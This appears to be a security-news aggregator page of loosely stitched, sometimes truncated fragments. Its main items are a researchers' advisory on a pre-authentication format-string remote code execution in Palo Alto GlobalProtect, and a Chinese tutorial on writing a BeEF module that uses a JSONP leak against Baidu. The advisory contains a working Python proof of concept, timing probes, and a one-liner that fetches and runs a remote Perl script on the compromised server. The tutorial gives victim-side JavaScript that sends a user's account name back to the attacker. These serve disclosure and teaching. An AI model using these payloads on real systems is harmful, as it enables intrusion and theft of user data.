Aggregator

MLSRC邀你参加OGeek网络安全挑战赛

If you’ve been on social media recently, you’ve probably seen some people in your feed posting images of themselves looking...

The post Downloaded FaceApp? Here’s How Your Privacy Is Now Affected appeared first on McAfee Blog.

Lori Mac Vittie writes for Network Computing, describing why serverless security doesn't have to be a struggle if you pay attention to the apps and focus on securing them.

算法题那么多，我们从简单的讲起......

In this companion podcast, the researchers who created the F5 Labs Application Protection Report discuss their findings, and share the details and backstories that helped shape the final report.

內容

在我們進行紅隊演練的過程中，發現目標使用的 Palo Alto GlobalProtect 存在 format string 弱點，透過此弱點可控制該 SSL VPN 伺服器，並藉此進入企業內網。

回報原廠後，得知這是個已知弱點並且已經 silent-fix 了，所以並未有 CVE 編號。經過我們分析，存在風險的版本如下，建議用戶儘速更新至最新版以避免遭受攻擊。

• Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
• Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
• Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

9.x 和 7.0.x 並沒有存在風險。

細節

我們也利用了這個弱點成功控制了 Uber 的 VPN 伺服器，詳細的技術細節請參閱我們的 Advisory： https://devco.re/blog/2019/07/17/attacking-ssl-vpn-part-1-PreAuth-RCE-on-Palo-Alto-GlobalProtect-with-Uber-as-case-study/

附註

這將會是我們 SSL VPN 研究的系列文，預計會有三篇。這也是我們研究團隊今年在 Black Hat USA 和 DEFCON 的演講『 Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs 』中的一小部分，敬請期待！

Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_)

SSL VPNs protect corporate assets from Internet exposure, but what if SSL VPNs themselves are vulnerable? They’re exposed to the Internet, trusted to reliably guard the only way to your intranet. Once the SSL VPN server is compromised, attackers can infiltrate your Intranet and even take over all users connecting to the SSL VPN server! Due to its importance, in the past several months, we started a new research on the security of leading SSL VPN products.

We plan to publish our results on 3 articles. We put this as the first one because we think this is an interesting story and is very suitable as an appetizer of our Black Hat USA and DEFCON talk:

• Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs!

Don’t worry about the spoilers, this story is not included in our BHUSA/DEFCON talks.

In our incoming presentations, we will provide more hard-core exploitations and crazy bugs chains to hack into your SSL VPN. From how we jailbreak the appliance and what attack vectors we are focusing on. We will also demonstrate gaining root shell from the only exposed HTTPS port, covertly weaponizing the server against their owner, and abusing a hidden feature to take over all VPN clients! So please look forward to it ;)

The story

In this article, we would like to talk about the vulnerability on Palo Alto SSL VPN. Palo Alto calls their SSL VPN product line as GlobalProtect. You can easily identify the GlobalPortect service via the 302 redirection to /global-protect/login.esp on web root!

About the vulnerability, we accidentally discovered it during our Red Team assessment services. At first, we thought this is a 0day. However, we failed reproducing on the remote server which is the latest version of GlobalProtect. So we began to suspect if this is a known vulnerability.

We searched all over the Internet, but we could not find anything. There is no public RCE exploit before[1], no official advisory contains anything similar and no CVE. So we believe this must be a silent-fix 1-day!

[1] There are some exploit about the Pan-OS management interface before such as the CVE-2017-15944 and the excellent Troppers16 paper by @_fel1x, but unfortunately, they are not talking about the GlobalProtect and the management interface is only exposed to the LAN port

The bug

The bug is very straightforward. It is just a simple format string vulnerability with no authentication required! The sslmgr is the SSL gateway handling the SSL handshake between the server and clients. The daemon is exposed by the Nginx reverse proxy and can be touched via the path /sslmgr.

$ curl https://global-protect/sslmgr <?xml version="1.0" encoding="UTF-8" ?> <clientcert-response> <status>error</status> <msg>Invalid parameters</msg> </clientcert-response>

During the parameter extraction, the daemon searches the string scep-profile-name and pass its value as the snprintf format to fill in the buffer. That leads to the format string attack. You can just crash the service with %n!

POST /sslmgr HTTP/1.1 Host: global-protect Content-Length: 36 scep-profile-name=%n%n%n%n%n... Affect versions

According to our survey, all the GlobalProtect before July 2018 are vulnerable! Here is the affect version list:

• Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
• Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
• Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

The series 9.x and 7.0.x are not affected by this vulnerability.

How to verify the bug

Although we know where the bug is, to verify the vulnerability is still not easy. There is no output for this format string so that we can’t obtain any address-leak to verify the bug. And to crash the service is never our first choice[1]. In order to avoid crashes, we need to find a way to verify the vulnerability elegantly!

By reading the snprintf manual, we choose the %c as our gadget! When there is a number before the format, such as %9999999c, the snprintf repeats the corresponding times internally. We observe the response time of large repeat number to verify this vulnerability!

$ time curl -s -d 'scep-profile-name=%9999999c' https://global-protect/sslmgr >/dev/null real 0m1.721s user 0m0.037s sys 0m0.005s $ time curl -s -d 'scep-profile-name=%99999999c' https://global-protect/sslmgr >/dev/null real 0m2.051s user 0m0.035s sys 0m0.012s $ time curl -s -d 'scep-profile-name=%999999999c' https://global-protect/sslmgr >/dev/null real 0m5.324s user 0m0.021s sys 0m0.018s

As you can see, the response time increases along with the number of %c. So, from the time difference, we can identify the vulnerable SSL VPN elegantly!

[1] Although there is a watchdog monitoring the sslmgr daemon, it’s still improper to crash a service!

The exploitation

Once we can verify the bug, the exploitation is easy. To exploit the binary successfully, we need to determine the detail version first. We can distinguish by the Last-Modified header, such as the /global-protect/portal/css/login.css from 8.x version and the /images/logo_pan_158.gif from 7.x version!

$ curl -s -I https://sslvpn/global-protect/portal/css/login.css | grep Last-Modified Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT

With a specified version, we can write our own exploit now. We simply modified the pointer of strlen on the Global Offset Table(GOT) to the Procedure Linkage Table(PLT) of system. Here is the PoC:

#!/usr/bin/python import requests from pwn import * url = "https://sslvpn/sslmgr" cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt" strlen_GOT = 0x667788 # change me system_plt = 0x445566 # change me fmt = '%70$n' fmt += '%' + str((system_plt>>16)&0xff) + 'c' fmt += '%32$hn' fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c' fmt += '%24$hn' for i in range(40,60): fmt += '%'+str(i)+'$p' data = "scep-profile-name=" data += p32(strlen_GOT)[:-1] data += "&appauthcookie=" data += p32(strlen_GOT+2)[:-1] data += "&host-id=" data += p32(strlen_GOT+4)[:-1] data += "&user-email=" data += fmt data += "&appauthcookie=" data += cmd r = requests.post(url, data=data)

Once the modification is done, the sslmgr becomes our webshell and we can execute commands via:

$ curl -d 'scep-profile-name=curl orange.tw/bc.pl | perl -' https://global-protect/sslmgr

We have reported this bug to Palo Alto via the report form. However, we got the following reply:

Hello Orange,

Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know.

Kind regards

Hmmm, so it seems this vulnerability is known for Palo Alto, but not ready for the world!

The case study

After we awared this is not a 0day, we surveyed all Palo Alto SSL VPN over the world to see if there is any large corporations using the vulnerable GlobalProtect, and Uber is one of them! From our survey, Uber owns about 22 servers running the GlobalProtect around the world, here we take vpn.awscorp.uberinternal.com as an example!

From the domain name, we guess Uber uses the BYOL from AWS Marketplace. From the login page, it seems Uber uses the 8.x version, and we can target the possible target version from the supported version list on the Marketplace overview page:

• 8.0.3
• 8.0.6
• 8.0.8
• 8.0.9
• 8.1.0

Finally, we figured out the version, it’s 8.0.6 and we got the shell back!

Uber took a very quick response and right step to fix the vulnerability and Uber gave us a detail explanation to the bounty decision:

Hey @orange — we wanted to provide a little more context on the decision for this bounty. During our internal investigation, we found that the Palo Alto SSL VPN is not the same as the primary VPN which is used by the majority of our employees.

Additionally, we hosted the Palo Alto SSL VPN in AWS as opposed to our core infrastructure; as such, this would not have been able to access any of our internal infrastructure or core services. For these reasons, we determined that while it was an unauthenticated RCE, the overall impact and positional advantage of this was low. Thanks again for an awesome report!

It’s a fair decision. It’s always a great time communicating with Uber and report to their bug bounty program. We don’t care about the bounty that much, because we enjoy the whole research process and feeding back to the security community! Nothing can be better than this!

前言 本文首发于安全客，转载请注明出处。 本文是《AI

Applying patches may be a basic security principle, but that doesn't mean it's always easy to do in practice.

手把青秧插野田, 低头便见水中天。心地清净方为道, 后退原来是向前。

本文首发于安全客，转载请注明出处。 本文是《AI与安

We&rsquo;re still thinking of Internet of Things devices as low risk when reality tells us exactly the opposite.

Discuz最新漏洞，尚未修复，欢迎各位师傅一起交流

JSONP漏洞实在是个好东西，但在挖掘的过程中需要耗费大量的时间看Burp来寻找JSONP格式的返回包，因此我实现了基于mitmproxy的漏洞辅助挖掘工具。
这个工具是mitmproxy的一个扩展，启动方法为mitmdump -s ./a.py -q，关于mitmproxy
在启动之后会打开一个本地8080上的HTTP代理，将浏览器的代理设置为http://127.0.0.1:8080并信任证书就可以使用了。该工具在发现了JSONP的HTTP Response之后会将URL和内容显示在终端。
说实话这工具写的很简陋，其实还可以加上什么检测返回结果敏感信息以及去Referer重放的，但我想反正一个站也没几个JSONP页面，不值得。
写完之后想要用这个和Burp的spider配合实现一键挖漏，但发现Burp的Spider实在不够好用，没办法覆盖全，至少我在我挖出洞的那个站点上面测试都没有成功。
运行如图：

链接：https://github.com/TomAPU/Scripts/tree/master/JsonpProxy

上周有媒体报道McAfee计划重新IPO，笔者听到这个消息虽有点感触，却无一点意外，两年前TPG和Thoma

0x00 前言         之前在█度上瞎逛的时候开着代理，顺手就找到了█度一个JSONP泄漏漏洞，能够泄漏完整用户名。         不得不说█度的安全真的烂，人家█讯跟它一个年代的，老代码照样很多，但我之前尝试了谷歌上能找到的大部分页面，各种老系统边缘业务都试过了，就只找到一个能泄漏QQ名的漏洞，而█度随便逛逛就能撞到漏洞。建议█度安全部的人自己给自己泼█宝矿泉水自裁谢罪         （本文不会贴出具体的漏洞，如果只是想看█度漏洞的可以退了）         很快，我就构建了个POC能够alert出用户名。我就开始疯狂YY能不能做一个取证溯源系统，挂一个JS就能查到各种信息。         但是我突然隐约记起来，好像有个叫做BEEF的框架已经能将各种欺负浏览器的技巧集成在它的框架里面了，仔细一看这玩意着实厉害，凭我个人无限趋近于零的水平不可能做出更好的来。所以本着不能打败敌人那就加入敌人的无耻精神，我打开BEEF开始研究如何自己写一个BEEF的插件将这个漏洞整合进去 0x01 BEEF插件编写         BEEF官方在他们的gayhub页面上给出了开发模块的方法，不过就只有这一页很多东西根本就没有讲清楚，而且用的还是本人不熟悉的ruby，在编写的时候踩了不少坑         先说下BEEF插件长啥样         BEEF的插件存在/usr/share/beef-xss/modules/exploits/baidu_account/下面的文件夹里面，每个文件夹代表了一个"category"，即不同类别的模块，比如社会工程，持久化，漏洞利用，网络拓扑信息搜集之类的。说实在的，这让我联想到了MSF，同样是ruby写的，同样喜欢用文件夹把不同的模块区别开来（还有同样语焉不详的奇妙文档）。         但是不同之处在于，BEEF的每个模块又得装在这个category的子文件夹里面，比如我今天要编写的模块名字叫做baidu_account，归类在Exploits里面。那这个模块的目录就得是/usr/share/beef-xss/modules/exploits/baidu_account/。为什么是目录呢？读者可能已经猜到了，BEEF的每个模块需要多个文件。         一个标准的BEEF模块由三个文件组成

• config.yaml : 用于描述该模块相关信息的YAML文件
• module.rb :个人理解是我们控制端的“后端”文件，用于
• command.js :发给受害者执行的payload 

        首先需要编写config.yaml来定义模块的相关信息，包括它属于哪个category，它的名字，适用于哪些浏览器以及作者信息之类的。我就直接贴上我照猫画虎的文件
beef: module: baidu_account: enable: true category: "Exploits" name: "get Baidu account" description: "通过JSONP漏洞获取█度帐号名" authors: ["APU"] target: working: ["ALL"] 开头的beef:和module:是起手式，大部分模块的开头都是这个，这个意思是定义一个模块。西面这个需要和你模块的文件夹名字相同不然会出现莫名其妙的错误。enable定义这个模块是否被启用，我们当然选择true。category选择Exploits,在这里需要注意，category不能乱写，不能自己新建一个文件夹尝试新建一个category否则运行会失败或者无法添加模块，如果有人直到怎么新建category请告诉我。name就是模块的名字，description就是描述，authors是作者，这里是一个list(不是很熟悉ruby,不知道术语说对了没)应该是允许一个模块对应多个作者的，target是对应的浏览器，target的格式可以在刚才的链接里面看到我就不详细讲了
        写完这个文件之后就要写module.rb了，我再贴上代码来
class Baidu_account < BeEF::Core::Command # This method will be called when BeEF will receive an answer from the hooked browser def post_execute content = {} content['Baidu_account'] = @datastore['Baidu_account'] save content end end         在这里我们需要定义一个类，用于后端的处理。类中可以定义三个函数，self.options,pre_send,post_execute。即参数，发送前的准备，发送后的准备。类名虽然没有具体规范，但是我看到的插件都是把文件夹名字大写作为类名。由于我这里jsonp漏洞利用主要是需要在利用之后接收参数，所以只定义post_execute。
        对于BEEF,想要接收受害者上传的参数应该使用@datastore，这个@datastore储存了受害机发上来的数据，至于是怎么发的我们先不用关心，只需要知道它能从这里面取参数就可以了。取到了参数我们还需要储存，因此我们需要使用save 来储存参数。我代码中储存数据的语句是save content。这个content是之前定义的一个字典，用于接收上传的参数的
        最后我们需要做的就是写我们的核心command.js了，我这里把打了码的command.js发上来
function getbaiduaccount(data) { username=data['username']; beef.net.send("<%= @command_url %>", <%= @command_id %>, "Baidu_account="+username); } beef.execute(function() { beef.dom.loadScript("█度神秘JSONP接口"); });         BEEF官方声称我们必须把payload放在beef.execute函数内来执行，但是我在这个函数之外定义callback函数也是ok的。BEEF官方提供了许多函数来支持我们的各种操作，唯一的问题就是他们的迫真文档只列出了名字，功能我们得自己猜。不过我这里蛮幸运的，用Chrome的调试一找就找到了这里的loadScript函数，这样就能用这个函数加载JSONP的接口。在callback函数中，我们需要把辛辛苦苦拿到的数据传回去，这里就要用到beef.net.send函数了
        这个函数是这么调用的beef.net.send("<%= @command_url %>", <%= @command_id %>, "data");其中data就是我们要传回去的东西，其中data是个字符串，传输的数据格式跟平时URL传参没啥区别，就是“参数名1=值1&参数名2=值2....”
        最后要说的坑就是首先每次打开BEEF的时候BEEF应该已经加载完了插件，你再修改也不会变除非重启BEEF。这个困扰了我很久，之前我一直调试不对，后来才发现其实不重启程序根本没有变化。还有就是之前我模块命名不规范，瞎搞了一会删掉之后WEB端还显示那个模块，那是因为/usr/share/beef-xss/db/beef.db有缓存，需要删掉才能刷新
0x02 展示图片

0x03最后再指点江山几句         最近发现一大堆人都喜欢造什么漏洞利用框架，每个界面都花里胡哨的，仔细一看无非就是调用python脚本去扫描别人统一管理，实际上并不实用。本人以为成功的漏洞利用框架首先是得研究的早，比如metasploit就抢占了先机，算是最先搞漏洞利用框架的几个，现在就发展的很好。还有就是框架之所以叫做框架除了暗示这些利用能被统一管理之外，还需要能够给模块编写者提供一些支持，帮助模块开发者完成一些重复琐碎的事项，减少模块编写者的工作量，不然只能算个漏洞利用集合不算优秀的框架。那些优秀的框架，比如metasploit的shellcode统一管理就很好，从此写二进制EXP的人就能减少很多编shellcode的工作量，进而把核心放在漏洞上。再比如今天看见的BEEF框架就能够很轻松地解决数据回传问题，不需要像https://lcx.cc/post/4595/里面从头开始写个专门收数据的后端。希望这个也能给想要编写XX框架的人一些思考

brief desc

这里提供官方的题目 https://github.com/paul-axe/ctf

今年 WCTF 还是被按在地上摩擦，就 pdoor 这个题目来说，感觉是相当值得多思考几遍

F5 Labs' Preston Hogue writes for SecurityWeek, explaining how you as a security professional are a source of friction - and therefore risk - and what to do about it.

对Redis的RCE进行的一次详细的复现流程

Publication of the UK’s process for how we handle vulnerabilities.